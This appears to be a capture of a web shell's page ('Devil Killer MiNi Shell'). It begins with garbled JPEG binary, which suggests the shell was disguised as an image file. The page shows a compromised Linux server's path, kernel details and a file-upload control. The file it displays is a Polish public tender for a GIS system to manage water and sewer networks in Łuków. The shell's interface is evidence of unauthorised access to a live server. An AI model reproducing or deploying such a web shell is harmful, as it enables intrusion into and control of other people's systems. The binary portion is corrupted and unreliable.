JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250819/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250819/0038138101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WDROŻENIE SYSTEMU GIS DO ZARZĄDZANIA MAJĄTKIEM SIECIOWYM </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Usług i Inżynierii Komunalnej sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 710063672</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Partyzantów 6b</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">25 798 22 04</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@puik.lukow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.puik.lukow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> PUIK Sp. z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WDROŻENIE SYSTEMU GIS DO ZARZĄDZANIA MAJĄTKIEM SIECIOWYM </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63166a8a-12bc-40a4-a7a0-c85f9308d6dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00381381</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://puik-lukow.ezamawiajacy.pl/servlet/HomeServlet. <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://puik-lukow.ezamawiajacy.pl/servlet/HomeServlet.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">18.6.	Zgodnie z art. 67 ustawy Pzp., Zamawiający podaje wymagania techniczne związane<br/> z korzystaniem z Platformy:<br/>18.6.1.	Stały dostęp do sieci Internetowej o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>18.6.2.	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB RAM, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>18.6.3.	Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej <br/>w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>18.6.4.	Włączona obsługa JavaScript;<br/>18.6.5.	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>18.7.	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>18.8.	Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>18.8.1.	Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>18.9.	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">32/PN/DT/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 179295,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Opis przedmiotu zamówienia.<br/>4.4.1. Przedmiotem zamówienia jest dostawa i wdrożenie Systemu Informacji Przestrzennej do zarządzania infrastrukturą wodociągowo – kanalizacyjną w formie stacjonarnej (aplikacje: przeglądarkowa, desktop) i formie mobilnej (aplikacja: mobilna dostępna do pobrania po zalogowaniu się do aplikacji przeglądarkowej, z poziomu aplikacji webowej) na urządzenia przenośne.<br/>4.4.2. Instalacja, uruchomienie oraz konfiguracja Systemu wraz z bazą danych na serwerze będącym w zasobie Zamawiającego.<br/>4.4.3. Migracja udostępnionych danych wodociągowych i kanalizacji sanitarnej - geoinformacyjnych sieci zgromadzonych w zasobach Zamawiającego (dane cyfrowe <br/>o charakterze GIS) wraz z ich przetworzeniem do struktury Systemu i poprawności topologicznej z zachowaniem zależności powiązań poszczególnych grup obiektów między sobą.<br/>4.4.4.	Uruchomienie i rozruch narzędzi organizacyjnych GIS oraz modułów dodatkowych branżowych:<br/>•	Zdarzenia na sieci: Awarie i Zadania (komponenty: Panel dyspozytora, Analiza zasuw, Zadania),<br/>•	Biling i wodomierze (komponenty: Legalizacja, Rozbiór wody – Strefy DMA, Wykrywanie anomalii, Analiza zużyć, Nieprzypisane wodomierze),<br/>•	Przeglądy hydrantów,<br/>•	Integracja z istniejącym systemem SCADA plus integracja z systemem bilingowym,<br/>•	Okno SQL.<br/>4.4.5.	Personalizacja aplikacji pod kątem potrzeb Przedsiębiorstwa.<br/>4.4.6.	Przeprowadzenie pakietu szkoleń specjalistycznych z obsługi, edycji i administracji Systemem.<br/>4.4.7.	Dostarczenie bezterminowej licencji umożliwiającej legalne korzystanie <br/>z oprogramowania przez Zamawiającego, na nieograniczoną liczbę jego użytkowników<br/> (w dostępnie przeglądarkowym, desktop i w mobilnym) wraz z dostępem do internetowej dokumentacji użytkownika.<br/>4.4.8.	Zaprogramowania i implementacji do Systemu GIS integracji z systemem zewnętrznym bilingowym (integracja w oparciu o przygotowane i udostępnione przez Zamawiającego widoki bazodanowe z bazy danych systemu bilingowego).<br/>4.4.9.	Geolokalizacja obiektów punktowych pomiarowych: Wodomierzy i przepływomierzy wody i ścieków, <br/>4.4.10.	Usługa asysty technicznej w okresie wdrożenia i w okresie gwarancji.<br/>4.4.11.	Zapewnienie możliwości kontynuacji opieki technicznej pogwarancyjnej (aktywne wsparcie techniczne Systemu po upłynięciu okresu gwarancji – realizowane odrębnym zamówieniem). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38221000-0 - Geograficzne systemy informacyjne (GIS lub równorzędne)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty nie podlegające odrzuceniu zostaną poddane ocenie ofert w oparciu o kryteria podane poniżej.<br/>	Zamawiający dokona oceny ofert na podstawie wyniku osiągniętej liczby punktów <br/>w oparciu o podane poniżej kryteria i ustaloną punktację.<br/>	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/><br/>L.p	Kryterium	Waga [%]	Maksymalna ilość punktów jakie może otrzymać oferta za dane kryterium<br/>1	Cena (C)	100 %	[100,00] punktów<br/>RAZEM	100%	100,00 punktów<br/><br/>	Sposób oceny ofert:<br/><br/>Sposób oceny ofert: <br/>	W kryterium Cena (C) ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/><br/>C=C_N/〖C ob〗_ ×100%(waga)× 100<br/>gdzie: <br/>C - ilość punktów przyznanych Wykonawcy w kryterium cena <br/>CN - najniższa zaoferowana cena <br/>COB – cena zaoferowana w ofercie badanej <br/><br/> 26.4.2.Punktacja przyznana ofertom. <br/>	punktacja przyznawana ofertom w będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę. <br/>	za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą liczbę punktów,<br/>	maksymalna liczba punktów jaką może uzyskać Wykonawca wynosi – 100,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 14.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>14.1.1.	nie podlegają wykluczeniu,<br/>14.1.2.	spełniają warunki udziału w postępowaniu.<br/>14.2.	Zamawiający wymaga wykazania przez Wykonawców spełnienia warunków określonych <br/>w art. 112 ust. 2 ustawy Pzp, dotyczących:<br/>14.2.1.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.3.	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa wymagań w przedmiotowym zakresie;<br/>14.2.4.	zdolności technicznej lub zawodowej:<br/>14.2.4.1.	o uzyskanie zamówienia mogą ubiegać się Wykonawcy posiadający doświadczenie polegające na wykonaniu w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, przed upływem terminu składania ofert co najmniej:<br/>o	2 usług polegających na wdrożeniu Systemu Informacji Przestrzennej wraz z wykonaną integracją z systemami zewnętrznymi bilingowymi z automatyczną, wykonywaną cyklicznie wymianą danych, w którego skład wchodzą wszystkie trzy aplikacje klienckie: przeglądarka www wraz ze środowiskiem desktop oraz oprogramowaniem na urządzenia mobilne wraz z licencją bezterminową i na nielimitowaną liczbę użytkowników (kont) do wszystkich trzech aplikacji klienckich, o wartości nie mniejszej niż 150 000,00 zł netto za każdy z Systemów Informacji Przestrzennej.<br/>14.2.4.2.	Zamawiający wymaga aby Wykonawca wykazał się dysponowaniem osobami wyznaczonymi do realizacji niniejszego zamówienia spełniającymi następujące warunki:<br/>a)	Kierownik projektu:<br/>o	wykształcenie wyższe techniczne w zakresie: Automatyki lub Inżynierii Środowiska lub IT wraz z wykształceniem w zakresie Zarządzania Projektami,<br/>o	doświadczenie zawodowe: min. 5 lat kierowania projektami technicznymi <br/>w zakresie branży GIS.<br/>b)	Specjalista ds. Systemów Informacji Przestrzennej (GIS):<br/>o	wykształcenie wyższe dotyczące Systemów Informacji Przestrzennej (kierunek: Gospodarka Przestrzenna lub Geoinformacja i pokrewne),<br/>	doświadczenie zawodowe: udział w realizacji 4 projektów w ciągu ostatnich 5 lat, polegających na wdrożeniu Systemów Informacji Przestrzennej w przedsiębiorstwach zarządzających infrastrukturą wodociągowo - kanalizacyjną.<br/>c)	Programista:<br/>o	wykształcenie wyższe w zakresie IT,<br/>o	doświadczenie zawodowe: udział w realizacji 4 projektów w ciągu ostatnich 5 lat, polegających na wdrożeniu Systemów Informacji Przestrzennej <br/>w przedsiębiorstwach zarządzających infrastrukturą wodociągowo - kanalizacyjną.<br/>d)	Administrator IT:<br/>o	wykształcenie wyższe w zakresie IT,<br/>o	doświadczenie zawodowe: udział w realizacji 4 projektów w ciągu ostatnich 5 lat, polegających na wdrożeniu Systemów Informacji Przestrzennej <br/>w przedsiębiorstwach zarządzających infrastrukturą wodociągowo – kanalizacyjną,<br/>Ocena spełniania tego warunku zostanie dokonana w oparciu o dostarczone dokumenty tj. wykaz projektów zrealizowanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane.<br/>Powyższy warunek Wykonawcy wskazują w formularzu oferty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">15.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 108 ust. 1.Pzp. oraz art. 7 ust. 1 ustawy z dnia 15 kwietnia 2022 r. <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U z 2022 poz. 835) i art. 109 ust.1 pkt.4 ustawy Pzp.<br/>15.2.	Podstawy wykluczenia, o których mowa w art. 109 ust. 1.<br/>15.2.1.	Zamawiający nie przewiduje wykluczenia Wykonawcy w oparciu o art. 109 ust 1 Pzp.<br/>15.3.	Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania <br/>o udzielenie zamówienia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">16.2.1.	formularz ofertowy (wzór formularza stanowi załącznik nr 1 do SWZ) wraz z próbką systemu.<br/>16.2.2.	Ogólne zasady badania próbki:<br/>1. Wraz z ofertą należy podać dane do zalogowania się do aplikacji przeglądarkowej i dostęp do dokumentacji użytkownika – próbki systemu, która zawiera wskazane wyżej funkcjonalności (dopuszcza się pominięcie w próbce systemu tych danych, które wynikają bezpośrednio z integracji z systemami zewnętrznymi i zastąpienie ich wskazaniem konkretnych treści z dokumentacji użytkownika, które ją opisują i obrazują).<br/>2. Zamawiający dokona sprawdzenia złożonych ofert pod względem formalnym, a następnie dokona oceny złożonych ofert, i wyłoni Wykonawcę który uzyska największą ilość punktów. Próbka Systemu tego Wykonawcy zostanie poddana badaniu.<br/>3. Zamawiający dokona badania próbki Systemu w ciągu 7 dni roboczych licząc od dokonania przez Zamawiającego oceny złożonych ofert i wyłonieniu Wykonawcy najwyżej ocenionego.<br/>4. Badanie próbki Systemu będzie prowadzone jednorazowo, zamawiający nie dokonuje odbioru Sytemu, a jedynie sprawdza posiadanie przez niego zadeklarowane funkcjonalności. W przypadku stwierdzenia braku którejś <br/>z wymaganych funkcjonalności Zamawiający zwróci się do Wykonawcy <br/>o uzupełnienie danej funkcji w terminie 5 dni roboczych. W przypadku braku pełnej (zgodnej z OPZ) funkcjonalności Systemu Zamawiający odrzuci ofertę Wykonawcy.<br/>5.	W przypadku odrzucenia oferty po badaniu próbki Systemu w związku z brakiem funkcjonalności zadeklarowanej przez Wykonawcę, Zamawiający rozpocznie badanie próbki Sytemu następnego w kolejności Wykonawcy, który uzyskał najwyższą ilość punktów.<br/>6. Zamawiający wezwie Wykonawcę do zaprezentowania (w siedzibie Zamawiającego) funkcjonalności próbki systemu. Wykonawcy nie przysługuje dodatkowe wynagrodzenie z tego tytułu. Badanie funkcjonalności systemu odbędzie się w ciągu jednego dnia roboczego tj. maksymalnie 7 godzin roboczych. <br/>7. Odmówienie przez Wykonawcę udziału w procedurze badania próbki Systemu lub nie stawienie Wykonawcy w wyznaczonym dla niego terminie, bez wcześniejszego uzgodnienia z Zamawiającym przesunięcia tego terminu, będzie jednoznaczne z odrzuceniem oferty.<br/>8. W przypadku awarii / błędu oprogramowania, Wykonawca ma prawo do przerwy w badaniu próbki w celu naprawienia awarii/błędu. Nieusunięcie przez Wykonawcę awarii/błędu oprogramowania w czasie 5 dni roboczych powoduje zakończenie badania próbki z wynikiem negatywnym. W tym wypadku Zamawiający uzna, że oprogramowanie nie posiada cech/funkcjonalności oprogramowania określonego w opisie przedmiotu zamówienia, co spowoduje odrzucenie oferty. W przypadku zgłoszenia przez Wykonawcę usunięcia awarii/błędu systemu Zamawiający ma prawo do ponownego wezwania Wykonawcy do badania funkcjonalności systemu w siedzibie Zamawiającego na zasadach określonych w pkt.6. <br/>16.2.3.	aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu na podstawie art. 108 ust. 1 ustawy (w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym), według wzoru stanowiącego załącznik do SWZ – załącznik nr 2 do SWZ.<br/>16.2.4.	aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału<br/> w postępowaniu, o których mowa w art. 112 ust. 2 ustawy <br/>(w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym), według wzoru stanowiącego załącznik do SWZ – załącznik nr 3 do SWZ.<br/>16.2.5.	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 16.2.2, i 16.2.3 składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 14.9.	Zgodnie z art. 58 ustawy Pzp Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie konsorcjum) pod warunkiem, że ustanowią oni pełnomocnika określając zgodnie z art. 58 ust. 2 zakres jego uprawnień wobec Zamawiającego, a złożona przez nich oferta spełniać będzie następujące wymagania:<br/>14.9.1.	wraz z ofertą Wykonawcy wspólnie ubiegający się o zamówienie przedłożą dokument (np. pełnomocnictwo), określający co najmniej: strony występujące wspólnie oraz wskazujący pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>14.9.2.	każdy z Wykonawców wspólnie ubiegających się o 